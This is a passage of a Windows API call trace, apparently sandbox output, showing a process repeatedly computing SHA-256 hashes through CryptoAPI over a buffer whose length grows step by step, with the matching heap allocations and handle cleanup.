	[0154.922] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.922] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310618
	[0154.922] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310618, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310618, pdwDataLen=0x128aac) returned 1
	[0154.922] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.922] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.922] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.923] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.923] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0154.923] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.923] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310640
	[0154.923] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310640, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310640, pdwDataLen=0x128aac) returned 1
	[0154.923] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.923] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.923] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.923] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.923] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0154.923] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.923] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310668
	[0154.923] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310668, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310668, pdwDataLen=0x128aac) returned 1
	[0154.923] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.923] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.923] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.924] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.924] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0154.924] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.924] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310690
	[0154.924] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310690, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310690, pdwDataLen=0x128aac) returned 1
	[0154.924] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.924] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.924] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.924] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.924] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0154.924] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.924] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23106b8
	[0154.924] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23106b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23106b8, pdwDataLen=0x128aac) returned 1
	[0154.924] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.924] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.924] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.925] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.925] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0154.925] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.925] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23106e0
	[0154.925] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23106e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23106e0, pdwDataLen=0x128aac) returned 1
	[0154.925] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.925] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.925] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.925] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.925] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0154.925] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.925] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310708
	[0154.925] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310708, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310708, pdwDataLen=0x128aac) returned 1
	[0154.925] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.925] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.925] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.926] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.926] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0154.926] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.926] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310730
	[0154.926] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310730, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310730, pdwDataLen=0x128aac) returned 1
	[0154.926] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.926] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.926] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.926] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.926] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0154.926] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.926] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310758
	[0154.926] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310758, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310758, pdwDataLen=0x128aac) returned 1
	[0154.926] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.926] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.926] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.927] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.927] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0154.927] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.927] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310780
	[0154.927] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310780, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310780, pdwDataLen=0x128aac) returned 1
	[0154.927] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.927] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.927] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.927] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.927] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0154.927] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.927] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23107a8
	[0154.927] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23107a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23107a8, pdwDataLen=0x128aac) returned 1
	[0154.927] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.927] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.927] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.928] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.928] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0154.928] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.928] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23107d0
	[0154.928] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23107d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23107d0, pdwDataLen=0x128aac) returned 1
	[0154.928] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.928] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.928] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.928] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.928] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0154.928] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.928] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23107f8
	[0154.928] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23107f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23107f8, pdwDataLen=0x128aac) returned 1
	[0154.928] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.928] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.928] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.929] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.929] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0154.929] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.929] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310820
	[0154.929] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310820, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310820, pdwDataLen=0x128aac) returned 1
	[0154.929] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.929] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.929] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.929] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.929] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0154.929] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.929] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310848
	[0154.929] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310848, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310848, pdwDataLen=0x128aac) returned 1
	[0154.929] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.929] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.929] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.930] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.930] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0154.930] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.930] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310870
	[0154.930] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310870, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310870, pdwDataLen=0x128aac) returned 1
	[0154.930] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.930] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.930] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.930] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.930] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0154.930] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.930] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310898
	[0154.930] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310898, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310898, pdwDataLen=0x128aac) returned 1
	[0154.930] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.930] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.930] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.931] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.931] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0154.931] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.931] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23108c0
	[0154.931] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23108c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23108c0, pdwDataLen=0x128aac) returned 1
	[0154.931] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.931] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.931] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.931] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.931] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0154.931] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.931] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23108e8
	[0154.931] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23108e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23108e8, pdwDataLen=0x128aac) returned 1
	[0154.931] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.931] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.931] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.932] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.932] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0154.932] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.932] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310910
	[0154.932] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310910, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310910, pdwDataLen=0x128aac) returned 1
	[0154.932] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.932] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.932] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.932] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.932] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0154.932] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.932] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310938
	[0154.932] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310938, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310938, pdwDataLen=0x128aac) returned 1
	[0154.932] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.932] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.932] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.933] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.933] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0154.933] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.933] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310960
	[0154.933] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310960, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310960, pdwDataLen=0x128aac) returned 1
	[0154.933] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.933] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.933] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.933] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.933] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0154.933] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.933] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310988
	[0154.933] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2310988, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310988, pdwDataLen=0x128aac) returned 1
	[0154.933] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.934] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.934] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.934] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.934] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0154.934] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.934] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23109b0
	[0154.934] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23109b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23109b0, pdwDataLen=0x128aac) returned 1
	[0154.934] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.934] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.934] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.934] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.934] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0154.934] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.934] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23109d8
	[0154.935] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23109d8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23109d8, pdwDataLen=0x128aac) returned 1
	[0154.935] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.935] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.935] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.935] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.935] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0154.935] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.935] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310a00
	[0154.935] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2310a00, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2310a00, pdwDataLen=0x128aac) returned 1
